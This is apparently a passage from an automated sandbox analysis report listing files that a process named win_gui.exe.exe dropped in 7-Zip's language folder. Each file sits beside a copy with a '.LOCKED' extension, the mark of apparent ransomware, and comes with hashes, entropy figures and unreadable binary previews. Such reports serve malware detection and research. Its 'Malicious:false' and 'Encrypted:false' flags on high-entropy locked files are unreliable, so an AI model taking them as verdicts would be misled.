                                SSDEEP:384:APqTTnMP+5u6SbTc/JW0ouGrKZt/bnPcXPfBawj+VOv:WZ6SbTJ0++Zt/bPIBD
                                MD5:EADDFA23A909293F11B66DE0A302DA62
                                SHA1:2E02995D2FA6DE5AB77E19E3F01A35677D15C2C3
                                SHA-256:27FFE2862FA67173BED2195389ECCA3C0189F1FB52D601D8C5AE874DACF8551C
                                SHA-512:C1C257F732C22B6A9729E683AD5F98BEBB6C6714216CE1292099B14B8DB6317F62FAE9E5032DC9EFB31E7428C1EC72EA1FFE63172CFAE8A0F848761636617667
                                Malicious:false
                                Preview:ZE....9..]e..<b.z.O.h/!.&0...3.33^........rP.&]>...'-.1x.l..>.......y.-....Y.w......&.7..u.a.KX....wJM.P.yB2...x.~.7...:a...X.J..S.p...k.Q[...K......{.$..]XP.h.Y.........pl.....9.^Dl.QN..]...[cX4...*..?.S.H..xE.i."*B`..!....V2...0....?H^].....S..}.%*K*5d..&=.y....I.,$^.-7.7.0.B...E.....9. T...Y..0.......29.B.Q.(.U..fwlA...d..U../..$-(.6.......n?.. G6.O.CO^....!.,Ya.rt5...M8.......@c.^;..(.......W.'].F}..S2o.(..mj.g]~..9.P2..U..d..D..R.......M.Z.1.yGO..{..C>.~zI....64..9P..=..g.n}>,........acL.r<=7O.t.%#U..?b....\..].k...h..:@1...O}.X/2.H....C......}......$.9.=9.}.="C:/...s.....|........<....l|t......P?....w...@..C.v".]F..|*....4y.f....._...0....[9u.c..!........<F..p;.].?...fb..y...?.... .........(..l,./....p...........W........g`.)..G....._.....H.&:x.....U.`........-.T....8;...=z....C...e...~7.c.+.....T...d4(c...L..s....w9W.;..m.<r..H1.....:.V.M...X..l?..).V....g+..&....R................Dl.9.....2...N.)$..Kl.Y)...0..x....n....\./..

                                C:\Program Files\7-Zip\Lang\th.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16462
                                Entropy (8bit):7.988783538609353
                                Encrypted:false
                                SSDEEP:384:APqTTnMP+5u6SbTc/JW0ouGrKZt/bnPcXPfBawj+VOv:WZ6SbTJ0++Zt/bPIBD
                                MD5:EADDFA23A909293F11B66DE0A302DA62
                                SHA1:2E02995D2FA6DE5AB77E19E3F01A35677D15C2C3
                                SHA-256:27FFE2862FA67173BED2195389ECCA3C0189F1FB52D601D8C5AE874DACF8551C
                                SHA-512:C1C257F732C22B6A9729E683AD5F98BEBB6C6714216CE1292099B14B8DB6317F62FAE9E5032DC9EFB31E7428C1EC72EA1FFE63172CFAE8A0F848761636617667
                                Malicious:false
                                Preview:ZE....9..]e..<b.z.O.h/!.&0...3.33^........rP.&]>...'-.1x.l..>.......y.-....Y.w......&.7..u.a.KX....wJM.P.yB2...x.~.7...:a...X.J..S.p...k.Q[...K......{.$..]XP.h.Y.........pl.....9.^Dl.QN..]...[cX4...*..?.S.H..xE.i."*B`..!....V2...0....?H^].....S..}.%*K*5d..&=.y....I.,$^.-7.7.0.B...E.....9. T...Y..0.......29.B.Q.(.U..fwlA...d..U../..$-(.6.......n?.. G6.O.CO^....!.,Ya.rt5...M8.......@c.^;..(.......W.'].F}..S2o.(..mj.g]~..9.P2..U..d..D..R.......M.Z.1.yGO..{..C>.~zI....64..9P..=..g.n}>,........acL.r<=7O.t.%#U..?b....\..].k...h..:@1...O}.X/2.H....C......}......$.9.=9.}.="C:/...s.....|........<....l|t......P?....w...@..C.v".]F..|*....4y.f....._...0....[9u.c..!........<F..p;.].?...fb..y...?.... .........(..l,./....p...........W........g`.)..G....._.....H.&:x.....U.`........-.T....8;...=z....C...e...~7.c.+.....T...d4(c...L..s....w9W.;..m.<r..H1.....:.V.M...X..l?..).V....g+..&....R................Dl.9.....2...N.)$..Kl.Y)...0..x....n....\./..

                                C:\Program Files\7-Zip\Lang\tk.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9839
                                Entropy (8bit):7.979826203608219
                                Encrypted:false
                                SSDEEP:192:MQzlajguZA33AHkboyfp6oKHsV6qPv+/pxIuG1lDTGudTWEYtLxpC0cIl1tXY+V+:MQzwtZyZzsoIXs+QpdGVEYtu0D2+VOz
                                MD5:4D061A6FC01798D8D6693ADA909096FC
                                SHA1:67B8B2A07BBB512D37D45F85EA0F5DE19807B5AB
                                SHA-256:73BFAE9453404152CA2D2DA29BF5C12EF54920C3965AA051D7EBF0AD62919C18
                                SHA-512:749041D93D3374A7238B214F8255DD1193553DA643306D139D590D05F2BACEB8B2930D9129482C2A095DDA76BCBEE481085BCC8FFAB67AA7B0B92D5DBBD18FBD
                                Malicious:false
                                Preview:......^.,Q..ea9.~.ek.A>)..A..`x.W.@=1..!.........5..g0S+..D.,..8.P. |q2+J..[.L.r..c..Q.....>.....7/...7..".....#..u.^...)Jg.<r<Py.g.}..=,ijcm9...)g!..lU..O.7KT?.k;.A..h.\......Z...c...E.2.K&..S(..0.].S.|..NpgBrm(t@B.l.\.....cslx...k....s.Np....VL9.4.6.>......f...1.(... .......[.......z..&&.....p>.r.x ...........E.....J.....s....N...-.3 @...A........U.kxm.....Y..h.....dL.n..9e.0{...1^.O......tl.c...e..@....W}O..P.$@.BB.4o.B.Y%.&a.p5q.....7...o".shn....A....3`._.....29.V.=...H..........'.qrp...<.....]..x.,...S..T..et.I...Pg.++).u..'..k...a.\.3......+y;.E.....9..:..L..{.;..b)9J9..j..l.....U{gp|.....i..C...IS7...QL`..c........C....9r....cD..+Z...=.......gn.U...x.!.........Q.1+....N....#.....^... ...........a.X.C...;...gdJ!B@.W..$...A7.,n.V..,#..s.9V.RK..jC.T..4m.;)a..+?.....<..h..v.+..o.Y.r!..K_..<.f.\.0....]i'r../g...2..E..u.KE..Tj.o...d!.F3).+r.8..D/..2i9Y.)....{wI.l...P.8.."_g.G=..J...!.A.."O..s.Q.SC.......&.............1.Y..FoH06S

                                C:\Program Files\7-Zip\Lang\tk.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9839
                                Entropy (8bit):7.979826203608219
                                Encrypted:false
                                SSDEEP:192:MQzlajguZA33AHkboyfp6oKHsV6qPv+/pxIuG1lDTGudTWEYtLxpC0cIl1tXY+V+:MQzwtZyZzsoIXs+QpdGVEYtu0D2+VOz
                                MD5:4D061A6FC01798D8D6693ADA909096FC
                                SHA1:67B8B2A07BBB512D37D45F85EA0F5DE19807B5AB
                                SHA-256:73BFAE9453404152CA2D2DA29BF5C12EF54920C3965AA051D7EBF0AD62919C18
                                SHA-512:749041D93D3374A7238B214F8255DD1193553DA643306D139D590D05F2BACEB8B2930D9129482C2A095DDA76BCBEE481085BCC8FFAB67AA7B0B92D5DBBD18FBD
                                Malicious:false
                                Preview:......^.,Q..ea9.~.ek.A>)..A..`x.W.@=1..!.........5..g0S+..D.,..8.P. |q2+J..[.L.r..c..Q.....>.....7/...7..".....#..u.^...)Jg.<r<Py.g.}..=,ijcm9...)g!..lU..O.7KT?.k;.A..h.\......Z...c...E.2.K&..S(..0.].S.|..NpgBrm(t@B.l.\.....cslx...k....s.Np....VL9.4.6.>......f...1.(... .......[.......z..&&.....p>.r.x ...........E.....J.....s....N...-.3 @...A........U.kxm.....Y..h.....dL.n..9e.0{...1^.O......tl.c...e..@....W}O..P.$@.BB.4o.B.Y%.&a.p5q.....7...o".shn....A....3`._.....29.V.=...H..........'.qrp...<.....]..x.,...S..T..et.I...Pg.++).u..'..k...a.\.3......+y;.E.....9..:..L..{.;..b)9J9..j..l.....U{gp|.....i..C...IS7...QL`..c........C....9r....cD..+Z...=.......gn.U...x.!.........Q.1+....N....#.....^... ...........a.X.C...;...gdJ!B@.W..$...A7.,n.V..,#..s.9V.RK..jC.T..4m.;)a..+?.....<..h..v.+..o.Y.r!..K_..<.f.\.0....]i'r../g...2..E..u.KE..Tj.o...d!.F3).+r.8..D/..2i9Y.)....{wI.l...P.8.."_g.G=..J...!.A.."O..s.Q.SC.......&.............1.Y..FoH06S

                                C:\Program Files\7-Zip\Lang\tr.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10455
                                Entropy (8bit):7.982915108395473
                                Encrypted:false
                                SSDEEP:192:rxisRCkp5GLvbWV1Ezkkct4rAhCbNTF9Etu6GdXmPJ62J7m+VONI:rIsY+avSV1j2TFCtZGFmPJ62J7m+VONI
                                MD5:80F25D316E9A95BA3701C9782236EEB4
                                SHA1:C81C4A7D7E6A519B1E4C905511760FBDE776DA6F
                                SHA-256:6F5872556CE61E000F9BB8EC71C76DF5C6784C66C0C2AE57FE518526822A2AAF
                                SHA-512:CCFA6E235F5DB3118F846AFF8B43789DF341169779D62D107D02C7E163B0CF34FDEA87A03BB213150F304D3A7A3AEC89AE60B4A874038C62D5B5D2B1A68B64B2
                                Malicious:false
                                Preview:.F.gv..x.`...:...2s.O......uA%.......XhA....-].x.'.$g./.,n.)...P..n...2dzR.1..p.+.(n.@.K,...C.....K.FO4.\.V.g..A...n!W./....81|.IE...q...(........r.k$.P[...%H.@qJ.Wn.!..xq..F."&|.x..h..w..}H..3.\.. o.1...2....y.."OL5......O.>/.V......*'P...+\.p...J.ZtN......#.1.....@O.`k...3..$nE.'.T."....r.?....@G...?feI.jt.5...`..3.,v.]jN!+v..e.g.V3.L.3\.WD.#......@....\..(T..lx..C.,.."6...J...Ao.T....eZ.?r.i.{']k..s...'.ib...S.v.....$.........0.UN*..g....."iFJ...Q.h..q..<SY-'x... ..&TE.D.H4..:..{L...}m..c...J.t........../L..@.z'..P......*._..)..`...9j.).^K..#.w.PA+..J....W...[@W...62...]..q.K.yK.FQ>\'.r.C%p.}..n..Df.p.n..u\.".p....7......h@m.U.8a....=..@.)..,.vo..<...r..z.2/m?o:t........j.....w.....<r.>.36>......D!r.......0B.....".6...d4........4..I`-..y.0.87.x(L.D..g.p....S.....!%.G.a......C.&....[|...T.t.yfeW...q#...l&.....Ho...3.d...Z..".Q.'..O..\n...5.b..h.0....`M..C.D/.@...Zz#.q...*....GE&.....x.7p.w....c-M.G.......T....19BVW#6..+....$M..v:.XDI+.

                                C:\Program Files\7-Zip\Lang\tr.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10455
                                Entropy (8bit):7.982915108395473
                                Encrypted:false
                                SSDEEP:192:rxisRCkp5GLvbWV1Ezkkct4rAhCbNTF9Etu6GdXmPJ62J7m+VONI:rIsY+avSV1j2TFCtZGFmPJ62J7m+VONI
                                MD5:80F25D316E9A95BA3701C9782236EEB4
                                SHA1:C81C4A7D7E6A519B1E4C905511760FBDE776DA6F
                                SHA-256:6F5872556CE61E000F9BB8EC71C76DF5C6784C66C0C2AE57FE518526822A2AAF
                                SHA-512:CCFA6E235F5DB3118F846AFF8B43789DF341169779D62D107D02C7E163B0CF34FDEA87A03BB213150F304D3A7A3AEC89AE60B4A874038C62D5B5D2B1A68B64B2
                                Malicious:false
                                Preview:.F.gv..x.`...:...2s.O......uA%.......XhA....-].x.'.$g./.,n.)...P..n...2dzR.1..p.+.(n.@.K,...C.....K.FO4.\.V.g..A...n!W./....81|.IE...q...(........r.k$.P[...%H.@qJ.Wn.!..xq..F."&|.x..h..w..}H..3.\.. o.1...2....y.."OL5......O.>/.V......*'P...+\.p...J.ZtN......#.1.....@O.`k...3..$nE.'.T."....r.?....@G...?feI.jt.5...`..3.,v.]jN!+v..e.g.V3.L.3\.WD.#......@....\..(T..lx..C.,.."6...J...Ao.T....eZ.?r.i.{']k..s...'.ib...S.v.....$.........0.UN*..g....."iFJ...Q.h..q..<SY-'x... ..&TE.D.H4..:..{L...}m..c...J.t........../L..@.z'..P......*._..)..`...9j.).^K..#.w.PA+..J....W...[@W...62...]..q.K.yK.FQ>\'.r.C%p.}..n..Df.p.n..u\.".p....7......h@m.U.8a....=..@.)..,.vo..<...r..z.2/m?o:t........j.....w.....<r.>.36>......D!r.......0B.....".6...d4........4..I`-..y.0.87.x(L.D..g.p....S.....!%.G.a......C.&....[|...T.t.yfeW...q#...l&.....Ho...3.d...Z..".Q.'..O..\n...5.b..h.0....`M..C.D/.@...Zz#.q...*....GE&.....x.7p.w....c-M.G.......T....19BVW#6..+....$M..v:.XDI+.

                                C:\Program Files\7-Zip\Lang\tt.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14809
                                Entropy (8bit):7.986744098306116
                                Encrypted:false
                                SSDEEP:384:kCFF5v3HBU0/uDmJwzQaJt54Fol66QHLDt1VVs+VOC:kCFF5PzuKKPUoyHLJ1sO
                                MD5:8B98BA815DD738A12544017AD147EB14
                                SHA1:7A2F323E40A83A3268AB5DD8D7B3FE1A80224E34
                                SHA-256:9D346B6B005DBA7B594663C97259BFF05188F4DADFBC10F10FEE99A3A503DF03
                                SHA-512:426054145A6CEFE344DCA0CB8A4A284CFA4F9CDA2829FD70B24996F6160A28795BF2E0683508F57597BE871B3C3DF54BDDDC2DAE05684C25D48F10B2265A5B13
                                Malicious:false
                                Preview:.....u..cH....8.......x..#kc.Ht...Z....W..b@.^.O......z..2...@.n....E>+._..n....2D..k....`e.z.......:.B..".=..V..M]....]....*43.Qt...P..dG.6k.E./...=..c........)....O..r.r;^...R.q.j..3oC.'..4...3....._d..|..P^p.........m...4Y-..P.m.y[.l.R"SY:ylh..a.,....*......6.0...1j/...b.Q..JF.B..y.m.PCR.. B...$.>......y.....P.m...]S.&h(5E<.euv..<......lb.".....Vm1$.._.r...\5..|.z..?....Ls..P8.<K.H..._%.cu..a...L<.kh.<$.....m.!{....H.{.acAF!.&.%nu...h.4....,.d.....P...R.Y.#g.;]Xw.4.se.v1y$Z.G8..|..U2..R8....Pu......./3D.........z.........u..n.>...E..*.8.6h.0.t...6.}..0jd..r..C.#.Y....Z..Q..b.uW....O...z.l.b4....^v.\.:D._..c|.{.e...'32.}Hn....63.q.Wy.k.gx..fy.Zz[.&.\._<.{...{.M.3.....\...D.....Q:....-R.%.M..f.O..V..v..cq..p..!..MFBW.z..b+.$..x]$}..........OIy.......t.B.%NU......T..R.#..../F..|`a..$.."..K..!...b .c.4...hac..........\A;g!.l...F.g...;.M.......Vcg.s..?....?.f8T\.:0i..0 '....0%.-........a....H.1z^at.?ehj....DW..i...i.%.((....p..e....W..\..J.....

                                C:\Program Files\7-Zip\Lang\tt.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14809
                                Entropy (8bit):7.986744098306116
                                Encrypted:false
                                SSDEEP:384:kCFF5v3HBU0/uDmJwzQaJt54Fol66QHLDt1VVs+VOC:kCFF5PzuKKPUoyHLJ1sO
                                MD5:8B98BA815DD738A12544017AD147EB14
                                SHA1:7A2F323E40A83A3268AB5DD8D7B3FE1A80224E34
                                SHA-256:9D346B6B005DBA7B594663C97259BFF05188F4DADFBC10F10FEE99A3A503DF03
                                SHA-512:426054145A6CEFE344DCA0CB8A4A284CFA4F9CDA2829FD70B24996F6160A28795BF2E0683508F57597BE871B3C3DF54BDDDC2DAE05684C25D48F10B2265A5B13
                                Malicious:false
                                Preview:.....u..cH....8.......x..#kc.Ht...Z....W..b@.^.O......z..2...@.n....E>+._..n....2D..k....`e.z.......:.B..".=..V..M]....]....*43.Qt...P..dG.6k.E./...=..c........)....O..r.r;^...R.q.j..3oC.'..4...3....._d..|..P^p.........m...4Y-..P.m.y[.l.R"SY:ylh..a.,....*......6.0...1j/...b.Q..JF.B..y.m.PCR.. B...$.>......y.....P.m...]S.&h(5E<.euv..<......lb.".....Vm1$.._.r...\5..|.z..?....Ls..P8.<K.H..._%.cu..a...L<.kh.<$.....m.!{....H.{.acAF!.&.%nu...h.4....,.d.....P...R.Y.#g.;]Xw.4.se.v1y$Z.G8..|..U2..R8....Pu......./3D.........z.........u..n.>...E..*.8.6h.0.t...6.}..0jd..r..C.#.Y....Z..Q..b.uW....O...z.l.b4....^v.\.:D._..c|.{.e...'32.}Hn....63.q.Wy.k.gx..fy.Zz[.&.\._<.{...{.M.3.....\...D.....Q:....-R.%.M..f.O..V..v..cq..p..!..MFBW.z..b+.$..x]$}..........OIy.......t.B.%NU......T..R.#..../F..|`a..$.."..K..!...b .c.4...hac..........\A;g!.l...F.g...;.M.......Vcg.s..?....?.f8T\.:0i..0 '....0%.-........a....H.1z^at.?ehj....DW..i...i.%.((....p..e....W..\..J.....

                                C:\Program Files\7-Zip\Lang\ug.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11994
                                Entropy (8bit):7.9799072458678255
                                Encrypted:false
                                SSDEEP:192:dFwAQqbwk/etldGi5Xh4aoxWV6tt/Lt3ivV80Gkpobg/whBk+VO6:dFdZbZevd55Xh4aoxrntP0Gkpobg/w6m
                                MD5:E457082AD226151F053F5AB3A34E6D2D
                                SHA1:BF150ABEB5501D8A7F0055B79FCD734A85AB9A70
                                SHA-256:41B8F87D6D90855A181E0475BBBB277CDB8CCDA3DD19B37388BA93D5DCDAD261
                                SHA-512:C31969218B21F3567A613726EB989C4104E7A37016E47540C3B334E7E7CB25E4C6CD2604D585230D27B90475A854D185387540C3F0FDA1A812D6D8AC4010CA67
                                Malicious:false
                                Preview:.......[E.s7.=A.b.Ux....".!...Fwv..-.><......*Y.t....S_kNh..[(.........~..Xg%@.3lM.t......../..{..Oi.@%.].P...C!.....w={..WX...t'.o..+:,K....*..B.J...<...L....g....x..C..{}5...M..w7.../Y.r.|..]........_.....9.....a....M.7...^.?....Xbe....u.0*.G.../....G..D{......K.c....k..T#.~G7..K...y(LH.m..c...$....M............Z...yix....N..wv.S.{".V....rd..Kx.-.e.k$.....|y68M.t......'..9..t].>..=.$.....].m..Sfs...va......[..&....y.?4).@3....|....+.....jwq..hQ..Dv.)r..zW.6S7... g...Z.5.......4.....,...."$qp$|.......P.{5....7...W...(...F.!.)Q.?....@........&g..g.-..P...lt..@.j5{&f~X...H..\.?.<.5y>..>..(...7....HQ'>Y.L...ir...9...K.<s.\..ejh..6..Z....S...[g.(K9t.R47.jn...H. .....$.c...u.*}...p.......a29p.ay...L..nE.....n....D......V.5..~..h..m9y.#.)#=.....SZ...O.N..~..........W..}.0.....p..M.S.%.a..o...%^X.%...$V.........-.....~;N.G..*..J...;n.a.2...F...A.o..<.y..q.y@.........en...Hc...jg,;.=...-w.o.....U...c.ef..`.>.".9.-!.t`yu...V'F..b.$........5@.).E.^.

                                C:\Program Files\7-Zip\Lang\ug.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11994
                                Entropy (8bit):7.9799072458678255
                                Encrypted:false
                                SSDEEP:192:dFwAQqbwk/etldGi5Xh4aoxWV6tt/Lt3ivV80Gkpobg/whBk+VO6:dFdZbZevd55Xh4aoxrntP0Gkpobg/w6m
                                MD5:E457082AD226151F053F5AB3A34E6D2D
                                SHA1:BF150ABEB5501D8A7F0055B79FCD734A85AB9A70
                                SHA-256:41B8F87D6D90855A181E0475BBBB277CDB8CCDA3DD19B37388BA93D5DCDAD261
                                SHA-512:C31969218B21F3567A613726EB989C4104E7A37016E47540C3B334E7E7CB25E4C6CD2604D585230D27B90475A854D185387540C3F0FDA1A812D6D8AC4010CA67
                                Malicious:false
                                Preview:.......[E.s7.=A.b.Ux....".!...Fwv..-.><......*Y.t....S_kNh..[(.........~..Xg%@.3lM.t......../..{..Oi.@%.].P...C!.....w={..WX...t'.o..+:,K....*..B.J...<...L....g....x..C..{}5...M..w7.../Y.r.|..]........_.....9.....a....M.7...^.?....Xbe....u.0*.G.../....G..D{......K.c....k..T#.~G7..K...y(LH.m..c...$....M............Z...yix....N..wv.S.{".V....rd..Kx.-.e.k$.....|y68M.t......'..9..t].>..=.$.....].m..Sfs...va......[..&....y.?4).@3....|....+.....jwq..hQ..Dv.)r..zW.6S7... g...Z.5.......4.....,...."$qp$|.......P.{5....7...W...(...F.!.)Q.?....@........&g..g.-..P...lt..@.j5{&f~X...H..\.?.<.5y>..>..(...7....HQ'>Y.L...ir...9...K.<s.\..ejh..6..Z....S...[g.(K9t.R47.jn...H. .....$.c...u.*}...p.......a29p.ay...L..nE.....n....D......V.5..~..h..m9y.#.)#=.....SZ...O.N..~..........W..}.0.....p..M.S.%.a..o...%^X.%...$V.........-.....~;N.G..*..J...;n.a.2...F...A.o..<.y..q.y@.........en...Hc...jg,;.=...-w.o.....U...c.ef..`.>.".9.-!.t`yu...V'F..b.$........5@.).E.^.

                                C:\Program Files\7-Zip\Lang\uk.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16370
                                Entropy (8bit):7.988757682318923
                                Encrypted:false
                                SSDEEP:384:ggT9I9v2aPH1KWOOambIvBBwjVfBKbGeOVDzoTKTEbcbf/sGr+VOK:ggE2aN0nmb2fwjPWGeOV4T8ccbf/sGre
                                MD5:B38C0373D4789B43BC156EFC2E956610
                                SHA1:6E2FD3FA38BC5EF5DBDF6933C66AD3EFAEA66B84
                                SHA-256:846B0EBC1CE0CD03323EFD9A6BE37FBDC8D2BE0E3E2FB7FD1AC0C856439F7F40
                                SHA-512:4E97C16E00DB0FEE0C5BBB097D87AA60B15E4A4A2B1AC7AFC36799502416A0B9A000D4ADE0A2A2229A05079BF00A32DE619DA69BF9993091F74F0A1DCF22BF53
                                Malicious:false
                                Preview:.[|.....yy.......s.......v#.=.oH.&.J<....K^ ".A...rL."..A..e....X..?uG.~.\..d.?...7.y|.lC..~.3g..*..X=.R.9..$2..#L.8.m...Q..U\.M.|..;...aus....N..Y..~....SWp3CT.S...U.I...,8M>6].IX6)[..........\.P......4z4*CjR.tl7-.)..p.e.8g.0...g..L..<.?.F..N.E..N._#.....+...1.........o..*`7s..+l.....v+...?\.....4....]z/vj.....f01....B..-=c|..s.:...w.1<~3.....O.)..k.'..d...5....)+........h.%.wU..........4..@...t.MA.."..)...g...f#..h..U.;.."e6.L.&.......|...`......>K.0=*.m..j...R+.~k,.[x.5n...Y.nV.`....^zzW....p0.Lm..0...]....[.i.9......8QG2,C]..z&.x.G..05G.W.`36$........9....<0.0n{..L......X.u...K......[2.....V.9.1c[..&?.nTe..Mjf..j..,......=...FL.Yr./..`...;..#.|m.......YD ...vE.?."..........q..n^O..F..<-KV&..+...c..3..]_....6..&aA......_h.K..j..QU9.k4%....[...;z=...d.....\.frN.9.Q./..41.S....'F(3.m..L]..]..o?<a..o...RS.2..~.pK...Q........K.22....I....]?.YE.&_...<...3i.6.C!.de..=...:..OF.x.k..x.>..k+..*[)zA...ry.J....-..A!..i..H.Tm..:x0WlcV:.dKk^.*...+[......

                                C:\Program Files\7-Zip\Lang\uk.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16370
                                Entropy (8bit):7.988757682318923
                                Encrypted:false
                                SSDEEP:384:ggT9I9v2aPH1KWOOambIvBBwjVfBKbGeOVDzoTKTEbcbf/sGr+VOK:ggE2aN0nmb2fwjPWGeOV4T8ccbf/sGre
                                MD5:B38C0373D4789B43BC156EFC2E956610
                                SHA1:6E2FD3FA38BC5EF5DBDF6933C66AD3EFAEA66B84
                                SHA-256:846B0EBC1CE0CD03323EFD9A6BE37FBDC8D2BE0E3E2FB7FD1AC0C856439F7F40
                                SHA-512:4E97C16E00DB0FEE0C5BBB097D87AA60B15E4A4A2B1AC7AFC36799502416A0B9A000D4ADE0A2A2229A05079BF00A32DE619DA69BF9993091F74F0A1DCF22BF53
                                Malicious:false
                                Preview:.[|.....yy.......s.......v#.=.oH.&.J<....K^ ".A...rL."..A..e....X..?uG.~.\..d.?...7.y|.lC..~.3g..*..X=.R.9..$2..#L.8.m...Q..U\.M.|..;...aus....N..Y..~....SWp3CT.S...U.I...,8M>6].IX6)[..........\.P......4z4*CjR.tl7-.)..p.e.8g.0...g..L..<.?.F..N.E..N._#.....+...1.........o..*`7s..+l.....v+...?\.....4....]z/vj.....f01....B..-=c|..s.:...w.1<~3.....O.)..k.'..d...5....)+........h.%.wU..........4..@...t.MA.."..)...g...f#..h..U.;.."e6.L.&.......|...`......>K.0=*.m..j...R+.~k,.[x.5n...Y.nV.`....^zzW....p0.Lm..0...]....[.i.9......8QG2,C]..z&.x.G..05G.W.`36$........9....<0.0n{..L......X.u...K......[2.....V.9.1c[..&?.nTe..Mjf..j..,......=...FL.Yr./..`...;..#.|m.......YD ...vE.?."..........q..n^O..F..<-KV&..+...c..3..]_....6..&aA......_h.K..j..QU9.k4%....[...;z=...d.....\.frN.9.Q./..41.S....'F(3.m..L]..]..o?<a..o...RS.2..~.pK...Q........K.22....I....]?.YE.&_...<...3i.6.C!.de..=...:..OF.x.k..x.>..k+..*[)zA...ry.J....-..A!..i..H.Tm..:x0WlcV:.dKk^.*...+[......

                                C:\Program Files\7-Zip\Lang\uz-cyrl.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):15775
                                Entropy (8bit):7.9880630047034495
                                Encrypted:false
                                SSDEEP:384:NAiILxnEJo4XpJs62/52EpX0RWYYGVhWEvWnj+VOq:NrILxY/DwVeRJhsje
                                MD5:6E227FDE0DB745347D398F6F1C77873F
                                SHA1:8AA940902A766572C53F3B3F3FE55E11295C5303
                                SHA-256:D8379AD1F1A3E94298F44686E3F54997A658158C16E689923BF8027B1D7FB652
                                SHA-512:E12EE49B49A059F2FC03FB924D5FAF9E026F2081906FC666F7A8202EBBD3EBDFFDE8F51D50B246285D627C142C3211685D0428E4FE491A7F0441D89A3CCDE19E
                                Malicious:false
                                Preview:......[....4{.f....#..]~.U.....'..9JI.[.|.=TJ..QT..].^.7..H...#.."......!.#.<|.........n.E ....Q0......}f....`.5n.n.(.1..:..v.rL.B?.F.....^....3.....s|...F.h.T.~|s..A..9E..;y...e..#/.....T.d..o..0.l.T..-.../c'.mV.U).-..m..V.D.3..Hc....Q0..........ro.....b...qd..T....".K..T.:.|O.-x+..^&..C.)2../.J..z........c!+SN^>....z..^8..`o.D.([.a../4....../..$.Q.I*.t....R..Y.hN.......&.*........_.k..tms-j.Y..8....0@.2j..X..Yr..)........8...h....A..HP(......c....}...1.\.l]..q[....`..A...gf8\..,e.[.n..[..aY[........"...l..p......j.c.E....c...>..R...\...a;..0.o.}..J.....h..n.8.|.KS8.J.V.."..D....*V....|s,......S..7...K.f.....[...s.......<.......O@_JI HT.r.P.Krv...h.#$;t.7....w...Xhv.>.u..b.....R....h\7:......=.G.R.-\.X....y{.nZ~,.....~/oe...x?5)P...{..((.\...m.......YIR.Q..>.+..].E.....V.D-.M.........UH.."*M?.SdO..@..1.s.......&....psB..h.`...Z^.|.?.i....M..K..U............K.T!.N-.............ZK.^ r...Y.l.s...LeB..wC._@....m...2..<.N..:...xpVT.bD.....{=V.

                                C:\Program Files\7-Zip\Lang\uz-cyrl.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):15775
                                Entropy (8bit):7.9880630047034495
                                Encrypted:false
                                SSDEEP:384:NAiILxnEJo4XpJs62/52EpX0RWYYGVhWEvWnj+VOq:NrILxY/DwVeRJhsje
                                MD5:6E227FDE0DB745347D398F6F1C77873F
                                SHA1:8AA940902A766572C53F3B3F3FE55E11295C5303
                                SHA-256:D8379AD1F1A3E94298F44686E3F54997A658158C16E689923BF8027B1D7FB652
                                SHA-512:E12EE49B49A059F2FC03FB924D5FAF9E026F2081906FC666F7A8202EBBD3EBDFFDE8F51D50B246285D627C142C3211685D0428E4FE491A7F0441D89A3CCDE19E
                                Malicious:false
                                Preview:......[....4{.f....#..]~.U.....'..9JI.[.|.=TJ..QT..].^.7..H...#.."......!.#.<|.........n.E ....Q0......}f....`.5n.n.(.1..:..v.rL.B?.F.....^....3.....s|...F.h.T.~|s..A..9E..;y...e..#/.....T.d..o..0.l.T..-.../c'.mV.U).-..m..V.D.3..Hc....Q0..........ro.....b...qd..T....".K..T.:.|O.-x+..^&..C.)2../.J..z........c!+SN^>....z..^8..`o.D.([.a../4....../..$.Q.I*.t....R..Y.hN.......&.*........_.k..tms-j.Y..8....0@.2j..X..Yr..)........8...h....A..HP(......c....}...1.\.l]..q[....`..A...gf8\..,e.[.n..[..aY[........"...l..p......j.c.E....c...>..R...\...a;..0.o.}..J.....h..n.8.|.KS8.J.V.."..D....*V....|s,......S..7...K.f.....[...s.......<.......O@_JI HT.r.P.Krv...h.#$;t.7....w...Xhv.>.u..b.....R....h\7:......=.G.R.-\.X....y{.nZ~,.....~/oe...x?5)P...{..((.\...m.......YIR.Q..>.+..].E.....V.D-.M.........UH.."*M?.SdO..@..1.s.......&....psB..h.`...Z^.|.?.i....M..K..U............K.T!.N-.............ZK.^ r...Y.l.s...LeB..wC._@....m...2..<.N..:...xpVT.bD.....{=V.

